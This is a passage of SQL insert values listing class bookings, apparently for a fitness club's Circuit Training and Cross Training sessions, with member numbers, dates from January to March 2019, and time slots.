(14515, 393, 'CTR', '2019-02-28', '18h30', '19h30', 'Circuit Training'),
(14522, 132, 'CTR', '2019-02-27', '20h00', '21h00', 'Cross Training'),
(14513, 388, 'CTR', '2019-02-28', '20h30', '21h30', 'Circuit Training'),
(14512, 387, 'CTR', '2019-02-28', '20h30', '21h30', 'Circuit Training'),
(14511, 377, 'CTR', '2019-02-28', '18h30', '19h30', 'Circuit Training'),
(14510, 367, 'CTR', '2019-02-28', '18h30', '19h30', 'Circuit Training'),
(14509, 378, 'CTR', '2019-02-28', '18h30', '19h30', 'Circuit Training'),
(14508, 380, 'CTR', '2019-02-28', '19h30', '20h30', 'Circuit Training'),
(14519, 379, 'CTR', '2019-02-28', '19h30', '20h30', 'Circuit Training'),
(14496, 365, 'CTR', '2019-02-25', '19h00', '20h00', 'Circuit Training'),
(14495, 365, 'CTR', '2019-02-25', '19h00', '20h00', 'Circuit Training'),
(14494, 339, 'CTR', '2019-02-25', '19h00', '20h00', 'Circuit Training'),
(14493, 350, 'CTR', '2019-02-25', '19h00', '20h00', 'Circuit Training'),
(14492, 351, 'CTR', '2019-02-25', '19h00', '20h00', 'Circuit Training'),
(14491, 132, 'CTR', '2019-02-25', '19h00', '20h00', 'Circuit Training'),
(14490, 299, 'CTR', '2019-02-25', '19h00', '20h00', 'Circuit Training'),
(14489, 92, 'CTR', '2019-02-25', '18h00', '19h00', 'Cross Training'),
(14488, 138, 'CTR', '2019-02-25', '18h00', '19h00', 'Cross Training'),
(14487, 395, 'CTR', '2019-02-25', '18h00', '19h00', 'Cross Training'),
(14486, 255, 'CTR', '2019-02-25', '18h00', '19h00', 'Cross Training'),
(14485, 231, 'CTR', '2019-02-25', '18h00', '19h00', 'Cross Training'),
(14483, 392, 'CTR', '2019-02-18', '18h00', '19h00', 'Cross Training'),
(14482, 394, 'CTR', '2019-02-18', '18h00', '19h00', 'Cross Training'),
(14480, 92, 'CTR', '2019-02-20', '18h00', '19h00', 'Circuit Training'),
(14479, 92, 'CTR', '2019-02-18', '18h00', '19h00', 'Cross Training'),
(14498, 386, 'CTR', '2019-02-21', '19h30', '20h30', 'Circuit Training'),
(14477, 367, 'CTR', '2019-02-21', '18h30', '19h30', 'Circuit Training'),
(14476, 377, 'CTR', '2019-02-21', '18h30', '19h30', 'Circuit Training'),
(14499, 388, 'CTR', '2019-02-21', '19h30', '20h30', 'Circuit Training'),
(14497, 387, 'CTR', '2019-02-21', '19h30', '20h30', 'Circuit Training'),
(14502, 294, 'CTR', '2019-03-07', '18h30', '19h30', 'Circuit Training'),
(14520, 386, 'CTR', '2019-02-28', '20h30', '21h30', 'Circuit Training'),
(14470, 381, 'CTR', '2019-02-21', '19h30', '20h30', 'Circuit Training'),
(14469, 375, 'CTR', '2019-02-21', '18h30', '19h30', 'Circuit Training'),
(14505, 381, 'CTR', '2019-02-28', '19h30', '20h30', 'Circuit Training'),
(14664, 394, 'CTR', '2019-03-14', '20h30', '21h30', 'Circuit Training'),
(14504, 375, 'CTR', '2019-02-28', '18h30', '19h30', 'Circuit Training'),
(14465, 180, 'CTR', '2019-02-20', '20h00', '21h00', 'Cross Training'),
(14464, 165, 'CTR', '2019-02-20', '20h00', '21h00', 'Cross Training'),
(14463, 383, 'CTR', '2019-02-20', '20h00', '21h00', 'Cross Training'),
(14462, 344, 'CTR', '2019-02-20', '20h00', '21h00', 'Cross Training'),
(14461, 173, 'CTR', '2019-02-20', '19h00', '20h00', 'Circuit Training'),
(14506, 381, 'CTR', '2019-02-28', '20h30', '21h30', 'Circuit Training'),
(14459, 230, 'CTR', '2019-02-20', '19h00', '20h00', 'Circuit Training'),
(14458, 392, 'CTR', '2019-02-20', '18h00', '19h00', 'Circuit Training'),
(14457, 392, 'CTR', '2019-02-20', '18h00', '19h00', 'Circuit Training'),
(14481, 393, 'CTR', '2019-02-21', '18h30', '19h30', 'Circuit Training'),
(14455, 231, 'CTR', '2019-02-20', '18h00', '19h00', 'Circuit Training'),
(14454, 31, 'CTR', '2019-02-20', '18h00', '19h00', 'Circuit Training'),
(14453, 177, 'CTR', '2019-02-20', '18h00', '19h00', 'Circuit Training'),
(14452, 205, 'CTR', '2019-02-20', '18h00', '19h00', 'Circuit Training'),
(14451, 365, 'CTR', '2019-02-13', '20h00', '21h00', 'Cross Training'),
(14450, 132, 'CTR', '2019-02-13', '20h00', '21h00', 'Cross Training'),
(14449, 180, 'CTR', '2019-02-13', '20h00', '21h00', 'Cross Training'),
(14448, 165, 'CTR', '2019-02-13', '20h00', '21h00', 'Cross Training'),
(14447, 230, 'CTR', '2019-02-13', '19h00', '20h00', 'Circuit Training'),
(14446, 173, 'CTR', '2019-02-13', '19h00', '20h00', 'Circuit Training'),
(14445, 344, 'CTR', '2019-02-13', '18h00', '19h00', 'Circuit Training'),
(14444, 344, 'CTR', '2019-02-13', '19h00', '20h00', 'Circuit Training'),
(14443, 348, 'CTR', '2019-02-13', '19h00', '20h00', 'Circuit Training'),
(14442, 348, 'CTR', '2019-02-13', '19h00', '20h00', 'Circuit Training'),
(14441, 247, 'CTR', '2019-02-13', '19h00', '20h00', 'Circuit Training'),
(14440, 205, 'CTR', '2019-02-13', '18h00', '19h00', 'Circuit Training'),
(14439, 392, 'CTR', '2019-02-13', '18h00', '19h00', 'Circuit Training'),
(14438, 392, 'CTR', '2019-02-13', '18h00', '19h00', 'Circuit Training'),
(14437, 351, 'CTR', '2019-02-18', '19h00', '20h00', 'Circuit Training'),
(14436, 299, 'CTR', '2019-02-18', '19h00', '20h00', 'Circuit Training'),
(14435, 31, 'CTR', '2019-02-13', '18h00', '19h00', 'Circuit Training'),
(14434, 231, 'CTR', '2019-02-13', '18h00', '19h00', 'Circuit Training'),
(14433, 103, 'CTR', '2019-02-13', '18h00', '19h00', 'Circuit Training'),
(14432, 365, 'CTR', '2019-02-18', '19h00', '20h00', 'Circuit Training'),
(14431, 80, 'CTR', '2019-02-18', '19h00', '20h00', 'Circuit Training'),
(14430, 350, 'CTR', '2019-02-18', '19h00', '20h00', 'Circuit Training'),
(14429, 230, 'CTR', '2019-02-18', '19h00', '20h00', 'Circuit Training'),
(14428, 132, 'CTR', '2019-02-18', '19h00', '20h00', 'Circuit Training'),
(14426, 255, 'CTR', '2019-02-18', '18h00', '19h00', 'Cross Training'),
(14425, 231, 'CTR', '2019-02-18', '18h00', '19h00', 'Cross Training'),
(14484, 395, 'CTR', '2019-02-18', '18h00', '19h00', 'Cross Training'),
(14422, 390, 'CTR', '2019-02-14', '19h30', '20h30', 'Circuit Training'),
(14421, 391, 'CTR', '2019-02-14', '19h30', '20h30', 'Circuit Training'),
(14419, 349, 'CTR', '2019-02-11', '19h00', '20h00', 'Circuit Training'),
(14417, 381, 'CTR', '2019-02-14', '20h30', '21h30', 'Circuit Training'),
(14416, 388, 'CTR', '2019-02-14', '20h30', '21h30', 'Circuit Training'),
(14415, 386, 'CTR', '2019-02-14', '20h30', '21h30', 'Circuit Training'),
(14414, 387, 'CTR', '2019-02-14', '20h30', '21h30', 'Circuit Training'),
(14413, 367, 'CTR', '2019-02-14', '18h30', '19h30', 'Circuit Training'),
(14412, 380, 'CTR', '2019-02-14', '19h30', '20h30', 'Circuit Training'),
(14411, 381, 'CTR', '2019-02-14', '19h30', '20h30', 'Circuit Training'),
(14410, 132, 'CTR', '2019-02-14', '18h30', '19h30', 'Circuit Training'),
(14409, 377, 'CTR', '2019-02-14', '18h30', '19h30', 'Circuit Training'),
(14408, 375, 'CTR', '2019-02-14', '18h30', '19h30', 'Circuit Training'),
(14407, 103, 'CTR', '2019-02-07', '18h30', '19h30', 'Circuit Training'),
(14406, 389, 'CTR', '2019-02-21', '18h30', '19h30', 'Circuit Training'),
(14404, 80, 'CTR', '2019-02-07', '19h30', '20h30', 'Circuit Training'),
(14403, 80, 'CTR', '2019-02-07', '19h30', '20h30', 'Circuit Training'),
(14402, 341, 'CTR', '2019-02-11', '18h00', '19h00', 'Cross Training'),
(14427, 339, 'CTR', '2019-02-18', '19h00', '20h00', 'Circuit Training'),
(14395, 338, 'CTR', '2019-02-06', '18h00', '19h00', 'Circuit Training'),
(14398, 379, 'CTR', '2019-02-14', '19h30', '20h30', 'Circuit Training'),
(14393, 294, 'CTR', '2019-02-21', '18h30', '19h30', 'Circuit Training'),
(14399, 177, 'CTR', '2019-02-06', '18h00', '19h00', 'Circuit Training'),
(14391, 60, 'CTR', '2019-02-06', '20h00', '21h00', 'Cross Training'),
(14390, 165, 'CTR', '2019-02-06', '20h00', '21h00', 'Cross Training'),
(14389, 180, 'CTR', '2019-02-06', '20h00', '21h00', 'Cross Training'),
(14388, 132, 'CTR', '2019-02-06', '20h00', '21h00', 'Cross Training'),
(14387, 348, 'CTR', '2019-02-06', '19h00', '20h00', 'Circuit Training'),
(14386, 348, 'CTR', '2019-02-06', '19h00', '20h00', 'Circuit Training'),
(14385, 173, 'CTR', '2019-02-06', '19h00', '20h00', 'Circuit Training'),
(14384, 310, 'CTR', '2019-02-06', '19h00', '20h00', 'Circuit Training'),
(14383, 247, 'CTR', '2019-02-06', '19h00', '20h00', 'Circuit Training'),
(14382, 385, 'CTR', '2019-02-06', '18h00', '19h00', 'Circuit Training'),
(14381, 31, 'CTR', '2019-02-06', '18h00', '19h00', 'Circuit Training'),
(14380, 205, 'CTR', '2019-02-06', '18h00', '19h00', 'Circuit Training'),
(14405, 378, 'CTR', '2019-02-21', '18h30', '19h30', 'Circuit Training'),
(14377, 132, 'CTR', '2019-02-11', '19h00', '20h00', 'Circuit Training'),
(14376, 339, 'CTR', '2019-02-11', '19h00', '20h00', 'Circuit Training'),
(14375, 365, 'CTR', '2019-02-11', '19h00', '20h00', 'Circuit Training'),
(14374, 80, 'CTR', '2019-02-11', '19h00', '20h00', 'Circuit Training'),
(14373, 230, 'CTR', '2019-02-11', '19h00', '20h00', 'Circuit Training'),
(14372, 383, 'CTR', '2019-02-13', '20h00', '21h00', 'Cross Training'),
(14371, 350, 'CTR', '2019-02-11', '19h00', '20h00', 'Circuit Training'),
(14420, 92, 'CTR', '2019-02-11', '18h00', '19h00', 'Cross Training'),
(14369, 255, 'CTR', '2019-02-11', '18h00', '19h00', 'Cross Training'),
(14368, 231, 'CTR', '2019-02-11', '18h00', '19h00', 'Cross Training'),
(14366, 338, 'CTR', '2019-02-04', '18h00', '19h00', 'Cross Training'),
(14423, 138, 'CTR', '2019-02-18', '18h00', '19h00', 'Cross Training'),
(14364, 138, 'CTR', '2019-02-04', '18h00', '19h00', 'Cross Training'),
(14363, 230, 'CTR', '2019-02-06', '19h00', '20h00', 'Circuit Training'),
(14362, 388, 'CTR', '2019-02-07', '20h30', '21h30', 'Circuit Training'),
(14361, 371, 'CTR', '2019-02-21', '18h30', '19h30', 'Circuit Training'),
(14360, 386, 'CTR', '2019-02-07', '20h30', '21h30', 'Circuit Training'),
(14358, 344, 'CTR', '2019-02-06', '20h00', '21h00', 'Cross Training'),
(14357, 132, 'CTR', '2019-02-07', '18h30', '19h30', 'Circuit Training'),
(14356, 377, 'CTR', '2019-02-07', '18h30', '19h30', 'Circuit Training'),
(14359, 387, 'CTR', '2019-02-07', '20h30', '21h30', 'Circuit Training'),
(14379, 210, 'CTR', '2019-02-06', '18h00', '19h00', 'Circuit Training'),
(14353, 378, 'CTR', '2019-02-07', '18h30', '19h30', 'Circuit Training'),
(14352, 380, 'CTR', '2019-02-07', '19h30', '20h30', 'Circuit Training'),
(14397, 344, 'CTR', '2019-02-18', '18h00', '19h00', 'Cross Training'),
(14350, 381, 'CTR', '2019-02-07', '20h30', '21h30', 'Circuit Training'),
(14349, 381, 'CTR', '2019-02-07', '19h30', '20h30', 'Circuit Training'),
(14348, 375, 'CTR', '2019-02-07', '18h30', '19h30', 'Circuit Training'),
(14343, 344, 'CTR', '2019-02-04', '18h00', '19h00', 'Cross Training'),
(14342, 365, 'CTR', '2019-02-04', '19h00', '20h00', 'Circuit Training'),
(14341, 132, 'CTR', '2019-02-04', '19h00', '20h00', 'Circuit Training'),
(14340, 349, 'CTR', '2019-02-04', '19h00', '20h00', 'Circuit Training'),
(14339, 351, 'CTR', '2019-02-04', '19h00', '20h00', 'Circuit Training'),
(14338, 350, 'CTR', '2019-02-04', '19h00', '20h00', 'Circuit Training'),
(14346, 294, 'CTR', '2019-02-14', '18h30', '19h30', 'Circuit Training'),
(14336, 339, 'CTR', '2019-02-04', '19h00', '20h00', 'Circuit Training'),
(14335, 383, 'CTR', '2019-02-04', '19h00', '20h00', 'Circuit Training'),
(14334, 80, 'CTR', '2019-02-04', '19h00', '20h00', 'Circuit Training'),
(14333, 339, 'CTR', '2019-01-28', '19h00', '20h00', 'Circuit Training'),
(14327, 388, 'CTR', '2019-01-31', '20h30', '21h30', 'Circuit Training'),
(14326, 386, 'CTR', '2019-01-31', '20h30', '21h30', 'Circuit Training'),
(14325, 387, 'CTR', '2019-01-31', '20h30', '21h30', 'Circuit Training'),
(14331, 231, 'CTR', '2019-02-04', '18h00', '19h00', 'Cross Training'),
(14323, 230, 'CTR', '2019-01-28', '19h00', '20h00', 'Circuit Training'),
(14322, 304, 'CTR', '2019-01-28', '18h00', '19h00', 'Cross Training'),
(14328, 80, 'CTR', '2019-01-28', '18h00', '19h00', 'Cross Training'),
(14330, 210, 'CTR', '2019-01-30', '20h00', '21h00', 'Cross Training'),
(14347, 367, 'CTR', '2019-02-07', '18h30', '19h30', 'Circuit Training'),
(14312, 344, 'CTR', '2019-01-30', '18h00', '19h00', 'Circuit Training'),
(14311, 383, 'CTR', '2019-01-28', '19h00', '20h00', 'Circuit Training'),
(14310, 180, 'CTR', '2019-01-30', '20h00', '21h00', 'Cross Training'),
(14309, 365, 'CTR', '2019-01-30', '20h00', '21h00', 'Cross Training'),
(14308, 165, 'CTR', '2019-01-30', '20h00', '21h00', 'Cross Training'),
(14307, 60, 'CTR', '2019-01-30', '20h00', '21h00', 'Cross Training'),
(14306, 132, 'CTR', '2019-01-30', '20h00', '21h00', 'Cross Training'),
(14305, 173, 'CTR', '2019-01-30', '19h00', '20h00', 'Circuit Training'),
(14304, 348, 'CTR', '2019-01-30', '19h00', '20h00', 'Circuit Training'),
(14303, 348, 'CTR', '2019-01-30', '19h00', '20h00', 'Circuit Training'),
(14302, 366, 'CTR', '2019-01-30', '19h00', '20h00', 'Circuit Training'),
(14301, 363, 'CTR', '2019-01-30', '19h00', '20h00', 'Circuit Training'),
(14300, 230, 'CTR', '2019-01-30', '19h00', '20h00', 'Circuit Training'),
(14299, 310, 'CTR', '2019-01-30', '19h00', '20h00', 'Circuit Training'),
(14298, 247, 'CTR', '2019-01-30', '19h00', '20h00', 'Circuit Training'),
(14297, 205, 'CTR', '2019-01-30', '18h00', '19h00', 'Circuit Training'),
(14296, 385, 'CTR', '2019-01-30', '18h00', '19h00', 'Circuit Training'),
(14295, 92, 'CTR', '2019-01-30', '18h00', '19h00', 'Circuit Training'),
(14294, 231, 'CTR', '2019-01-30', '18h00', '19h00', 'Circuit Training'),
(14293, 138, 'CTR', '2019-01-30', '18h00', '19h00', 'Circuit Training'),
(14292, 31, 'CTR', '2019-01-30', '18h00', '19h00', 'Circuit Training'),
(14314, 381, 'CTR', '2019-01-31', '20h30', '21h30', 'Circuit Training'),
(14290, 367, 'CTR', '2019-01-31', '18h30', '19h30', 'Circuit Training'),
(14289, 378, 'CTR', '2019-01-31', '18h30', '19h30', 'Circuit Training'),
(14288, 132, 'CTR', '2019-01-31', '18h30', '19h30', 'Circuit Training'),
(14287, 80, 'CTR', '2019-01-24', '18h30', '19h30', 'Circuit Training'),
(14400, 365, 'CTR', '2019-02-06', '20h00', '21h00', 'Cross Training'),
(14319, 80, 'CTR', '2019-01-28', '18h00', '19h00', 'Cross Training'),
(14315, 381, 'CTR', '2019-01-31', '19h30', '20h30', 'Circuit Training'),
(14332, 255, 'CTR', '2019-02-04', '18h00', '19h00', 'Cross Training'),
(14283, 80, 'CTR', '2019-01-31', '18h30', '19h30', 'Circuit Training'),
(14282, 371, 'CTR', '2019-01-31', '18h30', '19h30', 'Circuit Training'),
(14281, 377, 'CTR', '2019-01-31', '18h30', '19h30', 'Circuit Training'),
(14280, 375, 'CTR', '2019-01-31', '18h30', '19h30', 'Circuit Training'),
(14279, 80, 'CTR', '2019-01-28', '19h00', '20h00', 'Circuit Training'),
(14278, 365, 'CTR', '2019-01-28', '19h00', '20h00', 'Circuit Training'),
(14277, 349, 'CTR', '2019-01-28', '19h00', '20h00', 'Circuit Training'),
(14275, 375, 'CTR', '2019-01-24', '18h30', '19h30', 'Circuit Training'),
(14274, 80, 'CTR', '2019-01-24', '18h30', '19h30', 'Circuit Training'),
(14272, 370, 'CTR', '2019-01-24', '18h30', '19h30', 'Circuit Training'),
(14271, 371, 'CTR', '2019-01-24', '18h30', '19h30', 'Circuit Training'),
(14270, 210, 'CTR', '2019-01-23', '18h00', '19h00', 'Circuit Training'),
(14269, 132, 'CTR', '2019-01-28', '19h00', '20h00', 'Circuit Training'),
(14268, 350, 'CTR', '2019-01-28', '19h00', '20h00', 'Circuit Training'),
(14267, 351, 'CTR', '2019-01-28', '19h00', '20h00', 'Circuit Training'),
(14266, 230, 'CTR', '2019-02-04', '19h00', '20h00', 'Circuit Training'),
(14264, 339, 'CTR', '2019-01-21', '18h00', '19h00', 'Cross Training'),
(14262, 138, 'CTR', '2019-01-28', '18h00', '19h00', 'Cross Training'),
(14259, 205, 'CTR', '2019-01-21', '18h00', '19h00', 'Cross Training'),
(14258, 344, 'CTR', '2019-01-21', '19h00', '20h00', 'Circuit Training'),
(14344, 294, 'CTR', '2019-02-07', '18h30', '19h30', 'Circuit Training'),
(14401, 60, 'CTR', '2019-02-06', '20h00', '21h00', 'Cross Training'),
(14316, 379, 'CTR', '2019-01-31', '19h30', '20h30', 'Circuit Training'),
(14256, 294, 'CTR', '2019-02-06', '19h00', '20h00', 'Circuit Training'),
(14317, 380, 'CTR', '2019-01-31', '19h30', '20h30', 'Circuit Training'),
(14253, 367, 'CTR', '2019-01-24', '18h30', '19h30', 'Circuit Training'),
(14252, 132, 'CTR', '2019-01-24', '18h30', '19h30', 'Circuit Training'),
(14273, 341, 'CTR', '2019-01-28', '18h00', '19h00', 'Cross Training'),
(14251, 377, 'CTR', '2019-01-24', '18h30', '19h30', 'Circuit Training'),
(14249, 379, 'CTR', '2019-01-24', '19h30', '20h30', 'Circuit Training et Bodyboxe'),
(14248, 381, 'CTR', '2019-01-24', '19h30', '20h30', 'Circuit Training et Bodyboxe'),
(14247, 103, 'CTR', '2019-01-17', '19h30', '20h30', 'Circuit Training et Bodyboxe'),
(14246, 60, 'CTR', '2019-01-23', '20h00', '21h00', 'Cross Training'),
(14245, 365, 'CTR', '2019-01-23', '20h00', '21h00', 'Cross Training'),
(14244, 383, 'CTR', '2019-01-23', '20h00', '21h00', 'Cross Training'),
(14243, 132, 'CTR', '2019-01-23', '20h00', '21h00', 'Cross Training'),
(14242, 165, 'CTR', '2019-01-23', '20h00', '21h00', 'Cross Training'),
(14241, 180, 'CTR', '2019-01-23', '20h00', '21h00', 'Cross Training'),
(14240, 366, 'CTR', '2019-01-23', '19h00', '20h00', 'Circuit Training'),
(14239, 363, 'CTR', '2019-01-23', '19h00', '20h00', 'Circuit Training'),
(14238, 173, 'CTR', '2019-01-23', '19h00', '20h00', 'Circuit Training'),
(14237, 230, 'CTR', '2019-01-23', '19h00', '20h00', 'Circuit Training'),
(14236, 310, 'CTR', '2019-01-23', '19h00', '20h00', 'Circuit Training'),
(14235, 247, 'CTR', '2019-01-23', '19h00', '20h00', 'Circuit Training'),
(14234, 348, 'CTR', '2019-01-23', '19h00', '20h00', 'Circuit Training'),
(14233, 348, 'CTR', '2019-01-23', '19h00', '20h00', 'Circuit Training'),
(14232, 80, 'CTR', '2019-01-23', '18h00', '19h00', 'Circuit Training'),
(14231, 92, 'CTR', '2019-01-23', '18h00', '19h00', 'Circuit Training'),
(14230, 231, 'CTR', '2019-01-23', '18h00', '19h00', 'Circuit Training'),
(14229, 31, 'CTR', '2019-01-23', '18h00', '19h00', 'Circuit Training'),
(14226, 338, 'CTR', '2019-01-16', '18h00', '19h00', 'Circuit Training'),
(14225, 375, 'CTR', '2019-01-17', '18h30', '19h30', 'Circuit Training'),
(14224, 376, 'CTR', '2019-01-16', '20h00', '21h00', 'Cross Training'),
(14221, 367, 'CTR', '2019-01-17', '18h30', '19h30', 'Circuit Training'),
(14260, 231, 'CTR', '2019-01-28', '18h00', '19h00', 'Cross Training'),
(14254, 341, 'CTR', '2019-01-21', '18h00', '19h00', 'Cross Training'),
(14218, 230, 'CTR', '2019-01-21', '19h00', '20h00', 'Circuit Training'),
(14217, 365, 'CTR', '2019-01-21', '19h00', '20h00', 'Circuit Training'),
(14216, 132, 'CTR', '2019-01-21', '19h00', '20h00', 'Circuit Training'),
(14215, 351, 'CTR', '2019-01-21', '19h00', '20h00', 'Circuit Training'),
(14214, 138, 'CTR', '2019-01-21', '18h00', '19h00', 'Cross Training'),
(14213, 255, 'CTR', '2019-01-21', '18h00', '19h00', 'Cross Training'),
(14210, 338, 'CTR', '2019-01-14', '18h00', '19h00', 'Cross Training'),
(14211, 56, 'CTR', '2019-01-21', '18h00', '19h00', 'Cross Training'),
(14207, 383, 'CTR', '2019-01-16', '20h00', '21h00', 'Cross Training'),
(14204, 376, 'CTR', '2019-01-14', '18h00', '19h00', 'Cross Training'),
(14203, 210, 'CTR', '2019-01-16', '18h00', '19h00', 'Circuit Training'),
(14202, 56, 'CTR', '2019-01-14', '18h00', '19h00', 'Cross Training'),
(14223, 365, 'CTR', '2019-01-16', '20h00', '21h00', 'Cross Training'),
(14212, 231, 'CTR', '2019-01-21', '18h00', '19h00', 'Cross Training'),
(14198, 165, 'CTR', '2019-01-16', '20h00', '21h00', 'Cross Training'),
(14197, 132, 'CTR', '2019-01-16', '20h00', '21h00', 'Cross Training'),
(14196, 60, 'CTR', '2019-01-16', '20h00', '21h00', 'Cross Training'),
(14195, 180, 'CTR', '2019-01-16', '20h00', '21h00', 'Cross Training'),
(14194, 366, 'CTR', '2019-01-16', '19h00', '20h00', 'Circuit Training'),
(14193, 363, 'CTR', '2019-01-16', '19h00', '20h00', 'Circuit Training'),
(14192, 348, 'CTR', '2019-01-16', '19h00', '20h00', 'Circuit Training'),
(14191, 339, 'CTR', '2019-01-16', '19h00', '20h00', 'Circuit Training'),
(14190, 230, 'CTR', '2019-01-16', '19h00', '20h00', 'Circuit Training'),
(14189, 310, 'CTR', '2019-01-16', '19h00', '20h00', 'Circuit Training'),
(14188, 92, 'CTR', '2019-01-16', '18h00', '19h00', 'Circuit Training'),
(14187, 31, 'CTR', '2019-01-16', '18h00', '19h00', 'Circuit Training'),
(14200, 381, 'CTR', '2019-01-17', '19h30', '20h30', 'Circuit Training et Bodyboxe'),
(14186, 231, 'CTR', '2019-01-16', '18h00', '19h00', 'Circuit Training'),
(14184, 376, 'CTR', '2019-01-17', '18h30', '19h30', 'Circuit Training'),
(14175, 376, 'CTR', '2019-01-09', '20h00', '21h00', 'Cross Training'),
(14174, 60, 'CTR', '2019-01-09', '20h00', '21h00', 'Cross Training'),
(14173, 48, 'CTR', '2019-01-09', '18h00', '19h00', 'Circuit Training'),
(14171, 294, 'CTR', '2019-01-30', '19h00', '20h00', 'Circuit Training'),
(14170, 294, 'CTR', '2019-01-24', '19h30', '20h30', 'Circuit Training et Bodyboxe'),
(14169, 294, 'CTR', '2019-01-23', '19h00', '20h00', 'Circuit Training'),
(14227, 138, 'CTR', '2019-01-23', '18h00', '19h00', 'Circuit Training'),
(14228, 205, 'CTR', '2019-01-23', '18h00', '19h00', 'Circuit Training'),
(14222, 205, 'CTR', '2019-01-16', '18h00', '19h00', 'Circuit Training'),
(14166, 375, 'CTR', '2019-01-10', '18h30', '19h30', 'Circuit Training'),
(14164, 344, 'CTR', '2019-01-23', '20h00', '21h00', 'Cross Training'),
(14261, 255, 'CTR', '2019-01-28', '18h00', '19h00', 'Cross Training'),
(14162, 344, 'CTR', '2019-01-16', '18h00', '19h00', 'Circuit Training'),
(14180, 380, 'CTR', '2019-01-17', '19h30', '20h30', 'Circuit Training et Bodyboxe'),
(14181, 379, 'CTR', '2019-01-17', '19h30', '20h30', 'Circuit Training et Bodyboxe'),
(14160, 367, 'CTR', '2019-01-10', '18h30', '19h30', 'Circuit Training'),
(14159, 80, 'CTR', '2019-01-14', '19h00', '20h00', 'Circuit Training'),
(14158, 365, 'CTR', '2019-01-14', '19h00', '20h00', 'Circuit Training'),
(14157, 132, 'CTR', '2019-01-14', '19h00', '20h00', 'Circuit Training'),
(14205, 350, 'CTR', '2019-01-21', '19h00', '20h00', 'Circuit Training'),
(14155, 351, 'CTR', '2019-01-14', '19h00', '20h00', 'Circuit Training'),
(14154, 230, 'CTR', '2019-01-14', '19h00', '20h00', 'Circuit Training'),
(14177, 344, 'CTR', '2019-01-16', '19h00', '20h00', 'Circuit Training'),
(14148, 366, 'CTR', '2019-01-09', '20h00', '21h00', 'Cross Training'),
(14147, 230, 'CTR', '2019-01-07', '19h00', '20h00', 'Circuit Training'),
(14146, 363, 'CTR', '2019-01-09', '20h00', '21h00', 'Cross Training'),
(14182, 377, 'CTR', '2019-01-17', '18h30', '19h30', 'Circuit Training'),
(14165, 231, 'CTR', '2019-01-14', '18h00', '19h00', 'Cross Training'),
(14143, 365, 'CTR', '2019-01-09', '20h00', '21h00', 'Cross Training'),
(14149, 132, 'CTR', '2019-01-09', '18h00', '19h00', 'Circuit Training'),
(14141, 180, 'CTR', '2019-01-09', '20h00', '21h00', 'Cross Training'),
(14140, 348, 'CTR', '2019-01-09', '19h00', '20h00', 'Circuit Training'),
(14139, 348, 'CTR', '2019-01-09', '19h00', '20h00', 'Circuit Training'),
(14137, 230, 'CTR', '2019-01-09', '19h00', '20h00', 'Circuit Training'),
(14136, 173, 'CTR', '2019-01-09', '19h00', '20h00', 'Circuit Training'),
(14135, 310, 'CTR', '2019-01-09', '19h00', '20h00', 'Circuit Training'),
(14134, 247, 'CTR', '2019-01-09', '19h00', '20h00', 'Circuit Training'),
(14183, 132, 'CTR', '2019-01-17', '18h30', '19h30', 'Circuit Training'),
(14132, 231, 'CTR', '2019-01-09', '18h00', '19h00', 'Circuit Training'),
(14176, 103, 'CTR', '2019-01-10', '18h30', '19h30', 'Circuit Training'),
(14130, 371, 'CTR', '2019-01-10', '18h30', '19h30', 'Circuit Training'),
(14129, 80, 'CTR', '2019-01-10', '19h30', '20h30', 'Circuit Training et Bodyboxe'),
(14128, 380, 'CTR', '2019-01-10', '19h30', '20h30', 'Circuit Training et Bodyboxe'),
(14127, 379, 'CTR', '2019-01-10', '19h30', '20h30', 'Circuit Training et Bodyboxe'),
(14126, 365, 'CTR', '2019-01-07', '19h00', '20h00', 'Cross Training'),
(14124, 351, 'CTR', '2019-01-07', '19h00', '20h00', 'Cross Training'),
(14125, 350, 'CTR', '2019-01-07', '19h00', '20h00', 'Cross Training'),
(14150, 304, 'CTR', '2019-01-14', '18h00', '19h00', 'Cross Training'),
(14179, 92, 'CTR', '2019-01-17', '19h30', '20h30', 'Circuit Training et Bodyboxe'),
(14152, 132, 'CTR', '2019-01-10', '18h30', '19h30', 'Circuit Training'),
(14120, 341, 'CTR', '2019-01-07', '18h00', '19h00', 'Cross Training'),
(14119, 260, 'CTR', '2019-01-07', '18h00', '19h00', 'Cross Training'),
(14118, 304, 'CTR', '2019-01-07', '18h00', '19h00', 'Cross Training'),
(14117, 338, 'CTR', '2019-01-07', '18h00', '19h00', 'Cross Training'),
(14116, 31, 'CTR', '2019-01-09', '18h00', '19h00', 'Circuit Training'),
(14115, 376, 'CTR', '2019-01-10', '18h30', '19h30', 'Circuit Training'),
(14113, 138, 'CTR', '2019-01-16', '18h00', '19h00', 'Circuit Training'),
(14109, 180, 'CTR', '2019-01-02', '18h00', '19h00', 'Circuit Training'),
(14108, 348, 'CTR', '2019-01-02', '19h00', '20h00', 'Circuit Training'),
(14107, 348, 'CTR', '2019-01-02', '19h00', '20h00', 'Circuit Training'),
(14106, 338, 'CTR', '2019-01-02', '18h00', '19h00', 'Circuit Training'),
(14105, 375, 'CTR', '2019-01-03', '18h30', '19h30', 'Circuit Training'),
(14104, 80, 'CTR', '2019-01-03', '18h30', '19h30', 'Circuit Training'),
(14103, 80, 'CTR', '2019-01-03', '18h30', '19h30', 'Circuit Training'),
(14101, 344, 'CTR', '2019-01-09', '20h00', '21h00', 'Cross Training'),
(14100, 344, 'CTR', '2019-01-07', '18h00', '19h00', 'Cross Training'),
(14112, 138, 'CTR', '2019-01-14', '18h00', '19h00', 'Cross Training'),
(14111, 132, 'CTR', '2019-01-03', '18h30', '19h30', 'Circuit Training'),
(14096, 310, 'CTR', '2019-01-02', '19h00', '20h00', 'Circuit Training'),
(14095, 247, 'CTR', '2019-01-02', '19h00', '20h00', 'Circuit Training'),
(14094, 367, 'CTR', '2019-01-03', '18h30', '19h30', 'Circuit Training'),
(14102, 80, 'CTR', '0000-00-00', '18h30', '19h30', 'Circuit Training'),
(14092, 255, 'CTR', '2019-01-14', '18h00', '19h00', 'Cross Training'),
(14091, 31, 'CTR', '2019-01-02', '18h00', '19h00', 'Circuit Training'),
(14090, 294, 'CTR', '2019-01-09', '19h00', '20h00', 'Circuit Training'),
(14089, 377, 'CTR', '2019-01-03', '18h30', '19h30', 'Circuit Training'),
(14088, 376, 'CTR', '2018-12-27', '18h30', '19h30', 'Circuit Training'),
(14110, 376, 'CTR', '2019-01-03', '18h30', '19h30', 'Circuit Training'),
(14084, 230, 'CTR', '2019-01-02', '19h00', '20h00', 'Circuit Training'),
(14083, 205, 'CTR', '2019-01-02', '18h00', '19h00', 'Circuit Training'),
